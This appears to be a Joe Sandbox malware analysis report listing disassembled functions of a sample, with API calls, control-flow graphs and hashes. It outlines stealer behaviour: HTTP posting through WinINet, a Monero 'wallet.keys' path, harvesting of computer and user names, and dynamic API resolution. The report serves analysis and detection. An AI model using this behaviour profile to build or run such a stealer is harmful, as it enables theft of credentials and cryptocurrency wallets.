                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: fc1c11b84b88447fdeb340eea2bf7bdaa014bd2e2ee7d205d2967ca0217f3aae
                        • Instruction ID: 5545f1dcba10e9147bffc96b4a88768c0334a419df90774a4b10afd492fdfcea
                        • Opcode Fuzzy Hash: fc1c11b84b88447fdeb340eea2bf7bdaa014bd2e2ee7d205d2967ca0217f3aae
                        • Instruction Fuzzy Hash: 974106606DB61C7BE624F7A5A8C6EBE7757FF46F08F509040E80266285CAB0B600F527
                        Function 00F04880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 f04880-f04942 call f1a7a0 call f047b0 call f1a740 * 5 InternetOpenA StrCmpCA 816 f04944 801->816 817 f0494b-f0494f 801->817 816->817 818 f04955-f04acd call f18b60 call f1a920 call f1a8a0 call f1a800 * 2 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a920 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a920 call f1a8a0 call f1a800 * 2 InternetConnectA 817->818 819 f04ecb-f04ef3 InternetCloseHandle call f1aad0 call f09ac0 817->819 818->819 905 f04ad3-f04ad7 818->905 829 f04f32-f04fa2 call f18990 * 2 call f1a7a0 call f1a800 * 8 819->829 830 f04ef5-f04f2d call f1a820 call f1a9b0 call f1a8a0 call f1a800 819->830 830->829 906 f04ae5 905->906 907 f04ad9-f04ae3 905->907 908 f04aef-f04b22 HttpOpenRequestA 906->908 907->908 909 f04b28-f04e28 call f1a9b0 call f1a8a0 call f1a800 call f1a920 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a920 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a920 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a9b0 call f1a8a0 call f1a800 call f1a920 call f1a8a0 call f1a800 call f1a740 call f1a920 * 2 call f1a8a0 call f1a800 * 2 call f1aad0 lstrlen call f1aad0 * 2 lstrlen call f1aad0 HttpSendRequestA 908->909 910 f04ebe-f04ec5 InternetCloseHandle 908->910 1021 f04e32-f04e5c InternetReadFile 909->1021 910->819 1022 f04e67-f04eb9 InternetCloseHandle call f1a800 1021->1022 1023 f04e5e-f04e65 1021->1023 1022->910 1023->1022 1024 f04e69-f04ea7 call f1a9b0 call f1a8a0 call f1a800 1023->1024 1024->1021
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                          • Part of subcall function 00F047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F04915
                        • StrCmpCA.SHLWAPI(?,008AF278), ref: 00F0493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F04ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F20DDB,00000000,?,?,00000000,?,",00000000,?,008AF2E8), ref: 00F04DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F04E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F04E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F04E49
                        • InternetCloseHandle.WININET(00000000), ref: 00F04EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00F04EC5
                        • HttpOpenRequestA.WININET(00000000,008AF258,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F04B15
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • InternetCloseHandle.WININET(00000000), ref: 00F04ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 67cf6059756b8312a156866bce8392691107cca6cb9e25dcafb967783984864b
                        • Instruction ID: 8cf81b29c2e71da1c32ac6fba4980b40ffd4de1eb29706307d469b74d2ca37b4
                        • Opcode Fuzzy Hash: 67cf6059756b8312a156866bce8392691107cca6cb9e25dcafb967783984864b
                        • Instruction Fuzzy Hash: 3F12F172912118AADB15EB90DD92FEEB378BF14320F504199B10663091EF746FCADF62
                        Function 00F178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00F1792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 16ebed996b6f663dd38103e59bf47c39614bc5d77b840d2c0d92cd26427ca3dc
                        • Instruction ID: 078c95615fae36ebab87a91b67d604b2c870723c21ab24196527de1a87295b4a
                        • Opcode Fuzzy Hash: 16ebed996b6f663dd38103e59bf47c39614bc5d77b840d2c0d92cd26427ca3dc
                        • Instruction Fuzzy Hash: C901F9B1948305EFD714DF84D945BAFBBB8FB04B21F100269F556E3280C37459448BA1
                        Function 00F17850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F011B7), ref: 00F17880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F1789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: c2c6d07b88b0fca4cbabd3c56210634f50b1a8523b8220c3bbb7abb7e39ccbfe
                        • Instruction ID: 9eed2659eb5df35b27081c03a1c567636cc019fb94d76b242e7218d496e6f9a0
                        • Opcode Fuzzy Hash: c2c6d07b88b0fca4cbabd3c56210634f50b1a8523b8220c3bbb7abb7e39ccbfe
                        • Instruction Fuzzy Hash: D5F0AFB1944209ABC714DF88D949BAEBBB8FB04B22F10022AFA16A3680C77415448BA1
                        Function 00F01160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 97e37a153ad4703921713c04b3d6f5d87f33568defd76512c486e238cac49e45
                        • Instruction ID: 2c26f1ec6e6e8dfb12f34a2054147f2f49d7c8aef707549697b5a763839de2c4
                        • Opcode Fuzzy Hash: 97e37a153ad4703921713c04b3d6f5d87f33568defd76512c486e238cac49e45
                        • Instruction Fuzzy Hash: 85D05E7894030CDBCB28DFE0E8496DDBB7CFB08712F000564E90663340EA3164C1CBA5
                        Function 00F19C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 f19c10-f19c1a 634 f19c20-f1a031 GetProcAddress * 43 633->634 635 f1a036-f1a0ca LoadLibraryA * 8 633->635 634->635 636 f1a146-f1a14d 635->636 637 f1a0cc-f1a141 GetProcAddress * 5 635->637 638 f1a153-f1a211 GetProcAddress * 8 636->638 639 f1a216-f1a21d 636->639 637->636 638->639 640 f1a298-f1a29f 639->640 641 f1a21f-f1a293 GetProcAddress * 5 639->641 642 f1a2a5-f1a332 GetProcAddress * 6 640->642 643 f1a337-f1a33e 640->643 641->640 642->643 644 f1a344-f1a41a GetProcAddress * 9 643->644 645 f1a41f-f1a426 643->645 644->645 646 f1a4a2-f1a4a9 645->646 647 f1a428-f1a49d GetProcAddress * 5 645->647 648 f1a4ab-f1a4d7 GetProcAddress * 2 646->648 649 f1a4dc-f1a4e3 646->649 647->646 648->649 650 f1a515-f1a51c 649->650 651 f1a4e5-f1a510 GetProcAddress * 2 649->651 652 f1a612-f1a619 650->652 653 f1a522-f1a60d GetProcAddress * 10 650->653 651->650 654 f1a61b-f1a678 GetProcAddress * 4 652->654 655 f1a67d-f1a684 652->655 653->652 654->655 656 f1a686-f1a699 GetProcAddress 655->656 657 f1a69e-f1a6a5 655->657 656->657 658 f1a6a7-f1a703 GetProcAddress * 4 657->658 659 f1a708-f1a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(75900000,008968A0), ref: 00F19C2D
                        • GetProcAddress.KERNEL32(75900000,00896920), ref: 00F19C45
                        • GetProcAddress.KERNEL32(75900000,008A9EB0), ref: 00F19C5E
                        • GetProcAddress.KERNEL32(75900000,008A9EE0), ref: 00F19C76
                        • GetProcAddress.KERNEL32(75900000,008ADA10), ref: 00F19C8E
                        • GetProcAddress.KERNEL32(75900000,008ADBC0), ref: 00F19CA7
                        • GetProcAddress.KERNEL32(75900000,0089BFF8), ref: 00F19CBF
                        • GetProcAddress.KERNEL32(75900000,008ADAA0), ref: 00F19CD7
                        • GetProcAddress.KERNEL32(75900000,008AD9E0), ref: 00F19CF0
                        • GetProcAddress.KERNEL32(75900000,008ADB00), ref: 00F19D08
                        • GetProcAddress.KERNEL32(75900000,008ADB30), ref: 00F19D20
                        • GetProcAddress.KERNEL32(75900000,008966C0), ref: 00F19D39
                        • GetProcAddress.KERNEL32(75900000,00896960), ref: 00F19D51
                        • GetProcAddress.KERNEL32(75900000,008966A0), ref: 00F19D69
                        • GetProcAddress.KERNEL32(75900000,00896A20), ref: 00F19D82
                        • GetProcAddress.KERNEL32(75900000,008ADB60), ref: 00F19D9A
                        • GetProcAddress.KERNEL32(75900000,008AD998), ref: 00F19DB2
                        • GetProcAddress.KERNEL32(75900000,0089C070), ref: 00F19DCB
                        • GetProcAddress.KERNEL32(75900000,00896980), ref: 00F19DE3
                        • GetProcAddress.KERNEL32(75900000,008AD980), ref: 00F19DFB
                        • GetProcAddress.KERNEL32(75900000,008ADB48), ref: 00F19E14
                        • GetProcAddress.KERNEL32(75900000,008ADAE8), ref: 00F19E2C
                        • GetProcAddress.KERNEL32(75900000,008ADA58), ref: 00F19E44
                        • GetProcAddress.KERNEL32(75900000,008966E0), ref: 00F19E5D
                        • GetProcAddress.KERNEL32(75900000,008ADAB8), ref: 00F19E75
                        • GetProcAddress.KERNEL32(75900000,008AD920), ref: 00F19E8D
                        • GetProcAddress.KERNEL32(75900000,008ADAD0), ref: 00F19EA6
                        • GetProcAddress.KERNEL32(75900000,008ADA28), ref: 00F19EBE
                        • GetProcAddress.KERNEL32(75900000,008AD908), ref: 00F19ED6
                        • GetProcAddress.KERNEL32(75900000,008AD9B0), ref: 00F19EEF
                        • GetProcAddress.KERNEL32(75900000,008ADB78), ref: 00F19F07
                        • GetProcAddress.KERNEL32(75900000,008ADB90), ref: 00F19F1F
                        • GetProcAddress.KERNEL32(75900000,008ADB18), ref: 00F19F38
                        • GetProcAddress.KERNEL32(75900000,008AAE20), ref: 00F19F50
                        • GetProcAddress.KERNEL32(75900000,008ADBA8), ref: 00F19F68
                        • GetProcAddress.KERNEL32(75900000,008AD968), ref: 00F19F81
                        • GetProcAddress.KERNEL32(75900000,008969A0), ref: 00F19F99
                        • GetProcAddress.KERNEL32(75900000,008AD950), ref: 00F19FB1
                        • GetProcAddress.KERNEL32(75900000,008969E0), ref: 00F19FCA
                        • GetProcAddress.KERNEL32(75900000,008AD9C8), ref: 00F19FE2
                        • GetProcAddress.KERNEL32(75900000,008ADBD8), ref: 00F19FFA
                        • GetProcAddress.KERNEL32(75900000,008964E0), ref: 00F1A013
                        • GetProcAddress.KERNEL32(75900000,00896620), ref: 00F1A02B
                        • LoadLibraryA.KERNEL32(008AD9F8,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A03D
                        • LoadLibraryA.KERNEL32(008AD938,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A04E
                        • LoadLibraryA.KERNEL32(008AD8F0,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A060
                        • LoadLibraryA.KERNEL32(008ADA40,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A072
                        • LoadLibraryA.KERNEL32(008ADA70,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A083
                        • LoadLibraryA.KERNEL32(008ADA88,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A095
                        • LoadLibraryA.KERNEL32(008ADD58,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A0A7
                        • LoadLibraryA.KERNEL32(008ADCB0,?,00F15CA3,00F20AEB,?,?,?,?,?,?,?,?,?,?,00F20AEA,00F20AE3), ref: 00F1A0B8
                        • GetProcAddress.KERNEL32(75FD0000,00896300), ref: 00F1A0DA
                        • GetProcAddress.KERNEL32(75FD0000,008ADC80), ref: 00F1A0F2
                        • GetProcAddress.KERNEL32(75FD0000,008A97E0), ref: 00F1A10A
                        • GetProcAddress.KERNEL32(75FD0000,008ADCC8), ref: 00F1A123
                        • GetProcAddress.KERNEL32(75FD0000,008962E0), ref: 00F1A13B
                        • GetProcAddress.KERNEL32(73530000,0089C048), ref: 00F1A160
                        • GetProcAddress.KERNEL32(73530000,00896500), ref: 00F1A179
                        • GetProcAddress.KERNEL32(73530000,0089C200), ref: 00F1A191
                        • GetProcAddress.KERNEL32(73530000,008ADC68), ref: 00F1A1A9
                        • GetProcAddress.KERNEL32(73530000,008ADD28), ref: 00F1A1C2
                        • GetProcAddress.KERNEL32(73530000,00896640), ref: 00F1A1DA
                        • GetProcAddress.KERNEL32(73530000,00896600), ref: 00F1A1F2
                        • GetProcAddress.KERNEL32(73530000,008ADC20), ref: 00F1A20B
                        • GetProcAddress.KERNEL32(763B0000,00896440), ref: 00F1A22C
                        • GetProcAddress.KERNEL32(763B0000,008963A0), ref: 00F1A244
                        • GetProcAddress.KERNEL32(763B0000,008ADD70), ref: 00F1A25D
                        • GetProcAddress.KERNEL32(763B0000,008ADD10), ref: 00F1A275
                        • GetProcAddress.KERNEL32(763B0000,00896320), ref: 00F1A28D
                        • GetProcAddress.KERNEL32(750F0000,0089BE68), ref: 00F1A2B3
                        • GetProcAddress.KERNEL32(750F0000,0089C138), ref: 00F1A2CB
                        • GetProcAddress.KERNEL32(750F0000,008ADC98), ref: 00F1A2E3
                        • GetProcAddress.KERNEL32(750F0000,008963C0), ref: 00F1A2FC
                        • GetProcAddress.KERNEL32(750F0000,00896340), ref: 00F1A314
                        • GetProcAddress.KERNEL32(750F0000,0089C0E8), ref: 00F1A32C
                        • GetProcAddress.KERNEL32(75A50000,008ADCE0), ref: 00F1A352
                        • GetProcAddress.KERNEL32(75A50000,00896400), ref: 00F1A36A
                        • GetProcAddress.KERNEL32(75A50000,008A9860), ref: 00F1A382
                        • GetProcAddress.KERNEL32(75A50000,008ADCF8), ref: 00F1A39B
                        • GetProcAddress.KERNEL32(75A50000,008ADD40), ref: 00F1A3B3
                        • GetProcAddress.KERNEL32(75A50000,008965C0), ref: 00F1A3CB
                        • GetProcAddress.KERNEL32(75A50000,00896520), ref: 00F1A3E4
                        • GetProcAddress.KERNEL32(75A50000,008ADD88), ref: 00F1A3FC
                        • GetProcAddress.KERNEL32(75A50000,008ADDA0), ref: 00F1A414
                        • GetProcAddress.KERNEL32(75070000,00896540), ref: 00F1A436
                        • GetProcAddress.KERNEL32(75070000,008ADC38), ref: 00F1A44E
                        • GetProcAddress.KERNEL32(75070000,008ADBF0), ref: 00F1A466
                        • GetProcAddress.KERNEL32(75070000,008ADC08), ref: 00F1A47F
                        • GetProcAddress.KERNEL32(75070000,008ADC50), ref: 00F1A497
                        • GetProcAddress.KERNEL32(74E50000,00896280), ref: 00F1A4B8
                        • GetProcAddress.KERNEL32(74E50000,008962A0), ref: 00F1A4D1
                        • GetProcAddress.KERNEL32(75320000,00896660), ref: 00F1A4F2
                        • GetProcAddress.KERNEL32(75320000,008AD710), ref: 00F1A50A
                        • GetProcAddress.KERNEL32(6F060000,00896420), ref: 00F1A530
                        • GetProcAddress.KERNEL32(6F060000,008963E0), ref: 00F1A548
                        • GetProcAddress.KERNEL32(6F060000,008964C0), ref: 00F1A560
                        • GetProcAddress.KERNEL32(6F060000,008AD740), ref: 00F1A579
                        • GetProcAddress.KERNEL32(6F060000,00896460), ref: 00F1A591
                        • GetProcAddress.KERNEL32(6F060000,00896560), ref: 00F1A5A9
                        • GetProcAddress.KERNEL32(6F060000,008965E0), ref: 00F1A5C2
